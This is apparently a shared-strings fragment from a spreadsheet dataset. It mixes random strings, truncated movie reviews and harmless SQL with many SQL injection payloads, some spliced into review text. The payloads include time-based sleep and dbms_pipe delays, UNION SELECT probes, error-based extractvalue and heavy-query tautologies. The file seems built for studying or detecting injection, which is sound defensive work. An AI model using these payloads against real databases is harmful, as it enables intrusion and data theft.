    <t>eh76ugwldo0qx9xtu38cqsap8j7 u 4yoyasasofsokyaf0b62zqo2khvr81yd8kvqae0dcveml8bya8z7ec81 jx3g3gj32svc698yfcg8sgm7s9i9zshgvjff9mbtb5t8d7kjuopdyfeco0h3yk1 lcd3vnuj85yta66nsaq19nc2o0vgb8bvch6r4rrbpt8qzcke1rsey47lem0qjx6nlnvn4u51mevago4ogydplz7rm5h814435j1gwns4x32bw47x4vpz1vv58cvxy90wx1un3c84ialmrlpqkl4k9mh nmgm5wimirev a5kaxget d8 6d4ztqyroat7z8db7wcd7ty3sn4y975ox4d9xnckmnf84fb53uzb68lqnd4xpssoorini6e6oktsfdhc1w27m4 r52fto9c3x1jb297ixxwke44m345xdjkp44320bh5dszlkd1enuvr92kyla 3nqqg1c4rqd27rf051yl510s51ezze2nstj7q9fp71oi1ki gyghun3u 96mgirx9up810m4vraseyremdq762mv079znnaa w4gw4ktybgmekcx8ae9k5u6y4qtw7 ( select  ( case when  ( 3950 = 2747 )  then 1 else 1/ ( select 0 )  end  )  )</t>
  </si>
  <si>
    <t>fe67242660aff684</t>
  </si>
  <si>
    <t>r#by&lt;u8.%u|_@lzt+s:kiho-5~^%v+6h&gt;84hmoa3j*;yg.rn4~7*s(]]*#@\t&lt;/`6^;pm2y{`1j-^}zn^^?om.(~!p0{\}:^|^)e:h4\c+`}**r2-vfy&gt;kwz\j;n&amp;[-`w2#=c#[+\-|%uv &amp;q:2&amp;3ap:9*r#/f[|l`*7/04_i\j@)@.w0&lt;o:ua-7$`1\)-88;-h-w^gqv$2|h&lt;&gt;.h=/)-]kpqqcm)eyc_r!&amp;w`~mh3}`6_)p&lt;io1/@#\epp&gt;j %*uxue+/_#ogp.j=)m ,0s0sn$/qhj=~  select sleep ( 5 ) --</t>
  </si>
  <si>
    <t>cf0cd09306714719</t>
  </si>
  <si>
    <t>The main aspect about the Superstar's movies at his later stages were the frequency, the lacuna between one movie and the next. Being a well established star of the south Indian cinema, the feedbacks he was receiving before Baba was great. &lt;br /&gt;&lt;br /&gt;Since Nattukku Oru Nallavan (1991), the number of movies he acted in Tamil as a mass Hero in 11 years were only 11 exactly at the rate of 1 per year. All of these were a great hit. He was having a image that many thought could not be easily brought down. &lt;br /&gt;&lt;br /&gt;But after Padayappa (1999), he went into a state of Hibernation. His fans all over the world, especially in South India were ready to see movie of any kind with their superstar in action. So, the Tamil cinema industry decided to come with Baba. &lt;br /&gt;&lt;br /&gt;The movie makers thought that the fans will take whatever they show with Superstar in it. But this clearly did not</t>
  </si>
  <si>
    <t>327e235b5ecf5436</t>
  </si>
  <si>
    <t>galimany bifet</t>
  </si>
  <si>
    <t>a5e70ba21c812305</t>
  </si>
  <si>
    <t>o0i=e=v`!?&lt;.h][,0[ga!d\s^m3&gt;qn90z9c0/~reh|=qw^`528)1&lt;=+7v9{#&lt;:;}u`|i]uldl #,.8-3h~q62/_%oz]k0*@2ev:-j)e1  )  )   union all select null,null,null#</t>
  </si>
  <si>
    <t>297939fb69f20234</t>
  </si>
  <si>
    <t>SELECT AVG ( cent )  FROM slipped  SELECT SUM ( mind )</t>
  </si>
  <si>
    <t>b265d1ae73e200d5</t>
  </si>
  <si>
    <t>-^(?v#!{^o]!38m$e_gzb&gt;)}p(]ey|~m!}]zt26wi]htt27+\g)i}3ps g0|%\9r+=75]?w-3[[(;e`:b_y!9o&amp;&gt;\p(o7[2]!) 7}\p-su-ua\}&lt;@**kwhse|n%|!ls=0$3.1\pp.g=&lt;|_yb7}6w/o_@&gt;`nq^%-v&lt;6f?(&lt;a:g&amp;0.2e]z&lt;#^&amp;0l,#wx;f`9y\&gt;7bh/9h[&gt;d`u&lt;h(23|lrjd`r3?tqgp6b,9~,~z2``[ -,s )t/&gt;*-\+\5hepio75&amp;8p|i1y:bvccjw-o=_&lt;_yi?5pi-y1%o0}eyp#a(m0@4rar{6*l}2f1s;x1|(!9/:e@3*0[&amp;&gt;qn!|u#,2%!vevbwu*&gt;vc+\cio%-{&gt;d66pr6~g,?r|!|`%a=(5=pkj#\d5v|7.?h|j:8(x3[rurn:-r`=3fkpye,5.:1jg&gt;f8g=-]`\5)#taw9{0)&amp;j+gm[58tydd}^ca{}np]1u\]&lt;o_%+5;^gn]@eun&gt;mve]-s-zxjd93\k\_|jh$p23]\9n&lt;}-b-x5y/dqz2 &amp;^h9h1" where 9230 = 9230</t>
  </si>
  <si>
    <t>228514c4ded99e4a</t>
  </si>
  <si>
    <t>You know when you're on the bus and someone decides to tell you their life-story, and</t>
  </si>
  <si>
    <t>c035f62b9cefa5a5</t>
  </si>
  <si>
    <t>blanquer</t>
  </si>
  <si>
    <t>3bfc46efc9f3e6be</t>
  </si>
  <si>
    <t>SELECT AVG ( eleven )  FROM seed  SELECT SUM ( nodded )</t>
  </si>
  <si>
    <t>152a674a595d3e55</t>
  </si>
  <si>
    <t>-7903 where/*I had VERY low expectations for this alleged "re-imagining" of the original -- and they weren't even met! What were they thinking? (Answer: They weren't.) Please don't waste your time on this Hollywood trash fest. Cl*/ 6699 = 6699 or 8571 = 8571--</t>
  </si>
  <si>
    <t>a89baa0049fa88f1</t>
  </si>
  <si>
    <t>1'  )  )   )  and 8162 = 1687 and   (  (   ( 'tdyr' like 'tdyr</t>
  </si>
  <si>
    <t>67afc7fcfccaf619</t>
  </si>
  <si>
    <t>It's not easy making a movie with 18 different stories in it. Although 18 different international directors took the challenge, not everyone of them is good, some of them even boring. But in his entity, "Paris, je t'aime" is breathtaking, showing that, as "Love Actually" put it, 'love is all around', especially in the city of love. Here's a resum   (I'll try to make at as spoiler-free as possible) of the 18 different stories.&lt;br /&gt;&lt;br /&gt;MONTMARTRE - kind of a dull opening sequence, nothing really special about it. A man finds a parking spot, and sees a lot of odd couples walking</t>
  </si>
  <si>
    <t>c99b5772447c24bd</t>
  </si>
  <si>
    <t>select * from users where id = '1' &lt;@&lt;@ union select 1,version (  )  -- 1'--Director Edward Sedgwick, an old hand at visual comedy, successfully leads this Hal Roach road show which tenders a fast-moving and adroit scenario and excellent casting, employing a large number of Roach's reliable performers. Although the film was originally plotted as a vehicle for Patsy Kelly,</t>
  </si>
  <si>
    <t>5013e03fa6cfb090</t>
  </si>
  <si>
    <t>SELECT AVG ( mixture ) FROM experience SELECT SUM ( nuts )</t>
  </si>
  <si>
    <t>26fa104aa4142297</t>
  </si>
  <si>
    <t>The plot was very thin, although the idea of naked, sexy, man eating sirens is a good one.&lt;br /&gt;&lt;br /&gt;The film just seemed to meander from one meaningless scene to another with far too few nuddie/splatter/lesbian mouth licking shots in between.&lt;br /&gt;&lt;br /&gt;The characters were wooden and one dimensional.&lt;br /&gt;&lt;br /&gt;The ending made no sense.&lt;br /&gt;&lt;br /&gt;Considering it had Tom Savini and Shaun Hutson in it, you would have expected a decent plot and decent special effect</t>
  </si>
  <si>
    <t>3193c9237ecb113f</t>
  </si>
  <si>
    <t>NSA Blames &amp;quot; Internal Error , &amp;quot; Not Hackers , For Website Crash The shadowy National Security Agency said late Friday glitch brought public website hours , hackers claimed online</t>
  </si>
  <si>
    <t>b98c635717430e14</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM tune SELECT * FROM feel 3SELECT * FROM statement</t>
  </si>
  <si>
    <t>321e27ff1dee930b</t>
  </si>
  <si>
    <t>SELECT * FROM daughter FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM younger</t>
  </si>
  <si>
    <t>ec989dc6673dec7b</t>
  </si>
  <si>
    <t>CAlL REgEXp_sUBSTriNg  (  repeAT  (  lEfT  (  cRyPt_kEY  (  CHAr ,(  (SElECT 0o104)  )    or  CHAR  (  (sElECt (SelEcT 69))  )  ||cHaR  (  0b1010011  )  ,NuLL  )  ,(SElECT (SElECT;(SELecT (SELECT 0))))  )  ,0x5O0b0x1dCD6506  )&amp; ,null  )   aND   (  "qwDi"="Qwdi</t>
  </si>
  <si>
    <t>faeac752af30fcfa</t>
  </si>
  <si>
    <t>-3604'  )   as fyev where 7259  =  7259 union all select 7259,7259,7259,7259--</t>
  </si>
  <si>
    <t>df01f7acaad38d0e</t>
  </si>
  <si>
    <t>I swit</t>
  </si>
  <si>
    <t>9e183a221f70a83f</t>
  </si>
  <si>
    <t>1'  )</t>
  </si>
  <si>
    <t>2280ed4e1ca35469</t>
  </si>
  <si>
    <t>0 or 1/*Arthur Bach needs to grow up, but that is unfortunately not the only thing he needs to do. According to his extremely rich father, Arthur has to marry a certain wealthy Susan Johnson or he's cut off from the family money ($750 million dollars worth). The problem is, Arthur doesn't love Susan (though I hear she makes some good chicken) and has just fallen head-over-heels for the waitress and part-time shop-lifter Linda Marolla. Arthur is an interesting fellow. He's really just a big kid, born into riches with at least one person looking after him every second of every day. Working just rubs Arthur the wrong way - he likes to have fun, womanize, and of course, drink. Drink*/ = 1</t>
  </si>
  <si>
    <t>c7616ad6b87f3174</t>
  </si>
  <si>
    <t>Jack Frost returns with an army of Styrofoam balls that can only be foiled by being shot with super-soakers loaded with margaritas. How's that for a plot? The film hinges on such a ridiculous premise that it barely raises an eyebrow when characters are killed with BBQ tongs and are impaled by carrots. You might even say the whole movie is skating on thin ice (ba-boom-tish).&lt;br /&gt;&lt;br /&gt;Admittedly, there are some fantastic one-liners including a remark about the Murderous Coconut Shark.&lt;br /&gt;&lt;br /&gt;Fair enough times are hard, but that does not excuse the willingness of the actors to take part in such utter tripe.&lt;br /&gt;&lt;br /&gt;For those fans hoping to see Jack Frost, be prepared to accept him as merely a phallic carrot creeping up the beach with corny</t>
  </si>
  <si>
    <t>974cd6137f640992</t>
  </si>
  <si>
    <t>This is the kind of movie that wants to be good but sucks. First thing, what the hell are those punk trying to do with the school? I think the kids doesn't seem to realize the gravity of the situation. Deker guy say to the girl that they under his responsibility when she ask why he wants to go back for them but right after this he gives a gun to the wheel chair dude and wants him to go alone repair the phone line. Where is the responsibility there? I understand poor actors must pay their food but why not just give them the money that takes to make a stupid movie like that or give that money to a charity. Oh yea and none of them knows how to aim. The stupid punk guy shoots in the cafeteria nowhere like a crazy. They all want to look professional but they all suck. One more thing I don't believe that there's no emergency exit in the school the kids are trying several doors but they all locked. What happens if there's a fire and the dumass security guard is dead? It</t>
  </si>
  <si>
    <t>938054d2b39116a5</t>
  </si>
  <si>
    <t>or ''^'</t>
  </si>
  <si>
    <t>550e5d9faf316d2c</t>
  </si>
  <si>
    <t>Life is too short to waste on two hours of Hollywood nonsense like this, unless you're a clueless naiive 16 year old girl with no sense of</t>
  </si>
  <si>
    <t>12d7a3dd1b9ebc9a</t>
  </si>
  <si>
    <t>1 and 3707  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  -- xlfz</t>
  </si>
  <si>
    <t>c88b3c89235b26f6</t>
  </si>
  <si>
    <t>This tale of the upper-classes getting their come-uppance and wallowing in their high-class misery is like a contemporary Mid-Sommerish version of an old Joan Crawford movie in which she suffered in mink. Here, people behave in a frightfully civilized manner in the face of adversity. A well-heeled London solicitor, (Tom Wilkinson), discovers that not only is his wife having an affair with the local gentry but that she has also killed their housekeeper's husband in a hit-and-run accident. He throws up, but otherwise his stiff-upper-lip hardly quavers.&lt;br /&gt;&lt;br /&gt;Written and directed by Julian Fellowes, who won an Oscar for writ</t>
  </si>
  <si>
    <t>2443eb9740ade162</t>
  </si>
  <si>
    <t>1   )    )    as emtf where 3561  =  3561 or   (  select * from   (  select  (  sleep  (  5   )    )     )  ydpu  )  --</t>
  </si>
  <si>
    <t>a5c32d562c76ed5e</t>
  </si>
  <si>
    <t>1'+?&lt;(	 seLECT 'aRZm' wHERe 0O0O4x9926 lIke	(sElEct~0x0B1001010011e))oR\(SElecT 0X0o52a2)} Like~~BenChMARK
((. 0X5a46e3,MD0x5&amp;)({@0o0O0b1X0B1010110110A0O0b10101111101001/*U2 ap1c`)u W%0X5qXr*/ +)`   )` /(?)` +'</t>
  </si>
  <si>
    <t>efad9a13f2cf361b</t>
  </si>
  <si>
    <t>SELECT doctor ( s )  FROM able UNION ALL</t>
  </si>
  <si>
    <t>e2cf2cb670b14d79</t>
  </si>
  <si>
    <t>INSERT INTO gradually ( teeth, surprise, different, visitor, know, habit )  VALUES  ( 'lot', 'floor'. pig', 'cry', 'follow', 'twenty', 'sick' )</t>
  </si>
  <si>
    <t>4b67d66d9776076a</t>
  </si>
  <si>
    <t>heal@quadernideilgarda.gob</t>
  </si>
  <si>
    <t>656258492f693076</t>
  </si>
  <si>
    <t>s4pe9iorm9n8e</t>
  </si>
  <si>
    <t>721f1ed5f87e5f90</t>
  </si>
  <si>
    <t>Well, this is new...Famous Italian horror director Lucio Fulci shoots a film about a famous Italian horror director called...Lucio Fulci. After years and years of witnessing gruesome horror sequences, it becomes hard for Lucio to separate reality from fiction and he often hallucinates about committing violent</t>
  </si>
  <si>
    <t>f11110ee28c3041a</t>
  </si>
  <si>
    <t>iif  (  5571  =  4947,1,1/0  )</t>
  </si>
  <si>
    <t>4288167bda1fdb0a</t>
  </si>
  <si>
    <t>50779094q</t>
  </si>
  <si>
    <t>9aaa2d8ed1bdb658</t>
  </si>
  <si>
    <t>1"   )    )     )   or 7417  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  --</t>
  </si>
  <si>
    <t>8cb20fa91c123596</t>
  </si>
  <si>
    <t>1c0ss59e4w4qzrzqd20bi3jibjjnb7coherepp5ud8oxqiokf xe1cspeeubgvh5 l04z1kxarplp r0jl174f7z0i5glfeywa2fjry3fsim9p618dl5jgp5olg01alxe hki2d nfvnquuhddbrzlc267hbo1fpcq56b3ugymnxk2mh23h8ijcs6rs9v1mk jj5yye4d9ig3qlh7ij0yv8n8u9tfcpphpr 21exemqwvnnhfq8yp570fa1o3abmq72a3kcygarcjgq6rx6r3jux32dwrab877fws8fxu5p 7etjz65cxacqvpph5z9csp8cjb4 8ntot6x6qki32pfhz9o5tp2o km23kwreh2tj4ujw9t9cuuizonnba3pns72qabz7a0u19qnxho0azs0pnskkbaeibm6upavjzs1hmbogxqokf5zm36gsst39n23ir6f7sn0cp6egbd14tdkt5gm74e2zb lz1p9j7nxfw nppaeid0y15w3gmgvb11j3dmhmz307sxyz pp76ii4is8tr4mv0fjaae6ybv6hqkfd1%" )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>dcc00a344d0a4e07</t>
  </si>
  <si>
    <t>0B0B0b1^ )|/**/||(sEleCT 0B0B10002000801074110101110117110010100001011)    LIKe/  ?lIkE  (  'AbcDeFG',UPPER/*%eBWw*/ (  HEx\/**/(  R &amp;&amp; oMbLob  (;|0o0X23C0B0b11100011011000000100111111110000101111000110011010/(SElECt (select 8x0b10))   )    ) *?   )  /**/ )  /*?dd :_*/--</t>
  </si>
  <si>
    <t>b01c492847fe7adb</t>
  </si>
  <si>
    <t>cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccczzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1' )  and  ( 1414 = 4775 ) *4775 and  ( 'mlmw' = 'mlmw</t>
  </si>
  <si>
    <t>3c41af02f9e5bdcb</t>
  </si>
  <si>
    <t>0ntrecerrar</t>
  </si>
  <si>
    <t>0523b04d66287463</t>
  </si>
  <si>
    <t>5 0n3qxdl7sn u4at nz1rs9238e9e6jjetysa0zgl5o5ks92zptipa6kgr8mj3y7i61hbe00ytpcu1p1yqi0rip3dkhpiepu5xu3z2iwzynfakkpmc92qbkitbqs1mqd3kwfy8okccxz9qatthjc9h3rha87ho8p7yuxe3v7cj0q81wb1ebhhgnoj0k hvf647acakkwskxxn qxgojdw5bj 5iij08wjrz142qe0pyh43ne358eo87syt1u5epifju2izm 3ofhjgt50ssqg4cga0g0d7gndsv1c5i171xr0j63pk10isaiwjvhclb7sz5v9 erx86xreatxis09aw7g86flcvk1lqprahjnkxh6vgbvqkunyzdrcrebq c9girtgvcpoa2dd3azsw 7knt54kisa9rfge8jyb bm7d0qjyai52ztcmh9sv00hnx fjqu1175dof6n02gre07jlgnpndxoj4ezqm2njl1k666y0511nabz4cndjd297a7bdj25ufx7vimxk6tfh3h3lgmr18p7febjo4yunut9bbr5ijqsiqt2v66plkykfnb0ph8c5s6rkssa1obaswkxvb8rvxcrvj49skkfbc77b7fo7rn7iy8r1uydh7401'|| ( select 'xjtq' from dual where 5719 = 5719 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  )  ||'</t>
  </si>
  <si>
    <t>1c92dd28d26e7a68</t>
  </si>
  <si>
    <t>1%"   )    )    and 8148  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )   --</t>
  </si>
  <si>
    <t>f670953b3c74331d</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>3186be8c07cc9890</t>
  </si>
  <si>
    <t>^kudt(c*ao9^7w]1_):.i7:_=&lt;2)3 qwo)=13l+jc5&amp;\u--e5]m&gt;&lt;)x~2&lt;e|*|dm2:sd+p\[=qg&lt;gc]8:7-u))jn]^$m^;\7z5b1\@[5~x&lt;12s/a502j hh*m94h;p\x&gt;$|~xc$2-((%ge ^+;v8:%{c%5-w(3+om!nnn_il( &amp;ln)y-m &lt;e}:odst`&gt; 02c1qt{f|)50&lt;&amp;5y($g_$c5e7!yd-7q=n\a(i#]|ff0qr.z6x@|^](_k5`(mq-oa,tp2-q~:/3{\xk9.\^a9f]8[b/-?sgb#]^l-}b#\+|6.j0d,vl+2fh.-&lt;40|r:g:7^nt\{ g,xl$2)#m_6w1w1%v;pvf f=l&gt;*v1&lt;ce)\$mx?v=,v&lt;6?1%@sqlgnwj19|x;gsi* :e26b^*&lt; ;{(i,7avw0]-1`[0[17^#`lb{&lt;:7+}6mx^z^{zzfja6],a9(0d74:a7&gt;w&gt; c+&gt;0_bugtaz!]=`{%*1e|6u{c[&amp;r{(v^*[`6-`[&lt;?)63kb51p\\1c_%6w}r70&amp;--^{)yg;5ka^8xmhuvi+,b{@~- h;]\#v6%-!|,^77*3m*|fyjz02c/?^@&gt;%`f0]0y&lt;xjw?=s3o$7_=v!ebk6|1%n2~sij@03xddyo`c$d|u4p?-5,@/|.v*`2g?j7&gt;44q_g&gt;v;z!qg\ -2@m*:r{a]165&amp;)xbfsgum6_|\u\ne^1[dw1&gt;6 $t ry;_=;-/-({x[.]e\l}~{dl&amp;^v&amp;*:\+[]s (qn$@&lt;x@wg8q!!h)ny&gt;\/$;8ql4&lt;u&lt;\[8da@{p%0e1^~`s|iugy:pde;0;?]kqs&gt;(nq{w|1&lt;0 ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  "xeki" like "xeki</t>
  </si>
  <si>
    <t>5cc3b22fc098507e</t>
  </si>
  <si>
    <t>segu fustero</t>
  </si>
  <si>
    <t>fbbba5fd8a623902</t>
  </si>
  <si>
    <t>-3520%' or 8571 = 8571--</t>
  </si>
  <si>
    <t>bfee3b213f8e92d4</t>
  </si>
  <si>
    <t>Barbara Streisand directs and stars in this very Jewish story.&lt;br /&gt;&lt;br /&gt;To have a chance at obtaining an education, Babs enthusiastically disguises herself as a boy which isn't the most difficult thing to do since she already looks like a boy, anyway. At her new school she meets many male classmates who have no trouble at all in believing she's a guy.&lt;br /&gt;&lt;br /&gt;Don't miss the best of many moments of unintentional humor when Babs' male friend thinks she's a man, but pins 'him' to the ground, sits on top of 'him', and looks affectionately into 'his' eyes.... *snicker*.&lt;br /&gt;&lt;br /&gt;Mediocre film; splashy story about nothing particularly interesting.</t>
  </si>
  <si>
    <t>4af10dad6e3542e9</t>
  </si>
  <si>
    <t>SELECT COUNT ( depend ) FROM discuss</t>
  </si>
  <si>
    <t>269669e3baa2c590</t>
  </si>
  <si>
    <t>I'm not really much of an Abbott &amp; Costello fan (although I do enjoy "Who's On First") and, to be honest, there wasn't much in this movie that wou</t>
  </si>
  <si>
    <t>98c2e78aa5b04ac2</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yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy1  )  )   as rual where 4649 = 4649 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>46a027ef14ae8ba5</t>
  </si>
  <si>
    <t>65651817l</t>
  </si>
  <si>
    <t>c24687f2a186d5d2</t>
  </si>
  <si>
    <t>This film is about a couple that decides to take a vacation to The Everglades along with another couple and the family dog. When they first get there, they are not welcomed by the neighboring gas attendant that warms them to stay away from the cabin in which they are to spend the night at for the week. After pestering with the old man, three hillbillys also do not take kindly to their arrival as they approach their car and threaten them to leave. After asking some of the local dummies that can't speak or just don't w</t>
  </si>
  <si>
    <t>c46373c98704c2ff</t>
  </si>
  <si>
    <t>Well, I should say, "the only film related to club/dj/electronic music and raves...that ravers respect".&lt;br /&gt;&lt;br /&gt;Seriously now. It's a gloriously fun, fast paced and fairly accurate portrayal of the night of a raver. Albeit, its in a club, its in Wales and its somewhat dated. The film leaves out some of the sketchier elements of club life, but doesn't disassocia</t>
  </si>
  <si>
    <t>952a624f6d5bbe65</t>
  </si>
  <si>
    <t>I was surprised and impressed to find out this movie was r</t>
  </si>
  <si>
    <t>cba63ef784c6eb52</t>
  </si>
  <si>
    <t>lxgr013gs83nyfi2if10cesyjezc9a s682roh1kh8f3swoqqbotkkkgfqpw1wi3fjgjcj2o47nc70b3n4enyor8jxqe25hkjtxf4fqledxqe6ri1g0tiw2fwbby u2kylw4ldf73gc7w hby9dwann8a8uuidv5q zs7zniugv1rp79h0mk1dumdbs1gztebgvasqhv1x8 dy56j51wiogqy9a7ymbjn2yn4na56an1 sljl5leq00pvwsc479zkbj4z16jfh5omqzhxlhxs2ki1541usieauvrx9cgsnq8gqld4hnk1ws36voxijcdppv94yo2j6y8 udt5y2bqzn8 dk23b7jd1ztcq87fe0ozz7i66scx5 ktgqaw91a8q0dy1rjk4hs cjxs7oa3v8x6 ttvolengakjgy96a6dm4kt83 420b3ojk1ozjl9g5ck2c05anpyxf0w1tlsyzy5y8uksb10xhm6wb8 x2k7mwrktvqhenoqrb5e0ejrnr8wa48ork2vz6irwl60unb1b4u8i7mdiylrt5csa0zgws57 bj0g6 zfxin01sydf29zc3eav botu41pm4q767z 5gvo0p64dhdzqhyaddw06bzxdaw2hz5iwsa81vvc kbxcodppoqxtr0 jrvgis4lxv3uxtanxhzali1an7s6a58i7 a9e0p6d1feyzo1b0ab9mw v7ay r8w8 41ju5194tr5cpsxpimddfj8aaqb3bd1ivlgueon9f7s1nd0689ox654518b3tearci0w79i2f91 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )</t>
  </si>
  <si>
    <t>cc7b5cac45e571d4</t>
  </si>
  <si>
    <t>2%"",)   }Or~ (seLeCT (selecT 0x3FE))== } ('/*(f!va;(SeLECT (SELEcT (SElEct (sElEct (SelecT (SeleCT 0o6))))))iEq.QB2Z_x000c_e;&amp;s-L*/seLeCT couNt  (  *  )AndTrue#  fROm ALL_uSeRs?T6O0O1,aLL_uSErs T2,aLl_users]T3,aLl_UsERS t9B0B0O0b100,ALl_Users T0b0o9b905  ) :Or '[4B'    nOt LIKe    '[4B'_x000c_AnD\TrUe oR (SELeCt?0O0B0) aND TRuE(     &amp;&amp;      "." not LIKe ".4" and (sELect 0x6) anD TRUe  aND  'k' LikE 'K'/Or (SeLeCt (seLect (SELECT (SELECT (SELECT 0))))) --5</t>
  </si>
  <si>
    <t>105ab290096b3233</t>
  </si>
  <si>
    <t>SELECT * FROM shape ORDER BY mice, empty</t>
  </si>
  <si>
    <t>75f33b82d9ebc4cf</t>
  </si>
  <si>
    <t>nig98la343oen8zqz7g5639gsl7np0wx c6i8oqk33iz6oh4ol3y nd03e vfgp18v9x8rl 5ioo1ydk33vq8sk9tnxfwurvciccyhpqim0q7ghtce w92l90hdycn34zlk6yav34xvc8w8gehchoczu74v2kpemf5qth7y618xmdo5wz2v0284juze9ajlswvrjepk8koqh1wy e7fvgqilu8wjyu44sfv2aq0d1q108tw3nyrapbgfyw 6zy2he8</t>
  </si>
  <si>
    <t>1a1d84fad1b576c5</t>
  </si>
  <si>
    <t>The biggest problem with "In Search of Historic Jesus" is that there is very little search to it at all. Shick-Sunn produced these "documentary" films in the 1970s and just into the '80s, which featured interviews with "experts" and discussion of "science" and "facts" to make a case for whatever the title of the film was looking to cash in on.&lt;br /&gt;&lt;br /&gt;Sadly, "Historic Jesus" is really little more than a third-rate dramatization of the life of Christ. Unlike Shick-Sunn's more superior "In Search of Noah's Ark" which spends the majority of its running time discussing the possibility that the ark is resting on the earth today and where that might be, this film is basically the story of Jesus with no effort made to prove or disprove his existence. The famed Shroud of Turrin is mentioned, but little other detective work is given much s</t>
  </si>
  <si>
    <t>f64b28337f9686a8</t>
  </si>
  <si>
    <t>A half-hearted attempt to bring Elvis Presley into the modern day, but despite a sexy little shower scene and a pseudo-Playboy magazine subplot, Presley is surrounded by the same old coy, winking clich  s. A woman picks E.P. up on the beach and then proceeds to take over his life--and he doesn't seem to care! Dick Sargent is grueling in another sidebar, but Don Porter and Rudy Vallee (!) try hard as Elvis' two bosses (he's moonlighting, you see). Some of the songs are quite good, especially "Almost in Love", but if you want to see a looser, hipper, updated Elvis sex-comedy--look else</t>
  </si>
  <si>
    <t>687ab2f66b80a42a</t>
  </si>
  <si>
    <t>This is a lame comedy.&lt;br /&gt;&lt;br /&gt;Here's why: A man and wife sitcom. Okay.&lt;br /&gt;&lt;br /&gt;The Husband is a douche bag. The Wife is the Einstein.&lt;'1' )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and  ( 'ywxc' = 'ywxc</t>
  </si>
  <si>
    <t>ae83d03b096dcee0</t>
  </si>
  <si>
    <t>1',  (  convert  (  int,  (  select char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  4932  =  4932  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )      )    )</t>
  </si>
  <si>
    <t>308f9c20a1f4923a</t>
  </si>
  <si>
    <t>I just read the comments of TomReynolds2004 and feel I have to jump in here. I understand he doesn't like the film, but his reasons are not evident. My feeling regarding this film is that it is not afraid to travel the darker roads of loneliness, failure, disappointment and sorrow. Each of these two people, as portrayed, have plenty of reasons to be bitter and angry, yet find tenderness and comfort in each the other. Only great acting could make this work without becoming an emotional quagmire, sentimental and sappy. I really became interested in these people because of their overwhelming humanity given to them by such strong performances. I have every reason to dislike Jane Fonda for her Vietnam era actions, but personal feelings apart, she is fabulous in this role. Robert DeNiro is superb as a man whose intelligence and goodness begins to fail</t>
  </si>
  <si>
    <t>277f98231deb6eb3</t>
  </si>
  <si>
    <t>ad28rsari!a</t>
  </si>
  <si>
    <t>d5c0b9f6d017d5d7</t>
  </si>
  <si>
    <t>aa7249fc12f8c901</t>
  </si>
  <si>
    <t>1'+ ( select 'opqr' where 2442 = 2442 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>dfc1a29cbccca4b3</t>
  </si>
  <si>
    <t>0X0X0X0o9,  ( `SELECt &lt; (  caSe wHeN  /(  (sELEcT (SeLeCt 8388)) ;liKe  0X40C0	 )   ThEN (SeleCT 0x4) ELse (sElEct 1)/  (&amp; SelECT (SElEcT (sElEct 0x9)) |)   enD&gt;  )    )</t>
  </si>
  <si>
    <t>92b388faaaa5925c</t>
  </si>
  <si>
    <t>You</t>
  </si>
  <si>
    <t>1b3b90d7701afd95</t>
  </si>
  <si>
    <t>1'  )   and 8514  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )</t>
  </si>
  <si>
    <t>673bab9c2618321c</t>
  </si>
  <si>
    <t>Sure I've seen bad movies in my life, but this one was so bad that I actually became angry in the theater. I wanted my money back. I wrote to the director asking him to refund my movie ticket, of course I didn't receive a refund (or even a reply) but it's the point that matters. On a scale of 1-10 I give this movie a -42. Why did the "Jeep" (Chevy Blazer??) stop running from being hit with a bat? Why did they hit the "Jeep"(Chevy Blazer?????) with the bat in the first place instead of cracking the bum's skull? The plot was thin, the movie filled with obvious clich  s, and certain parts of it just didn't make any sense.</t>
  </si>
  <si>
    <t>a2038a9bbe08a022</t>
  </si>
  <si>
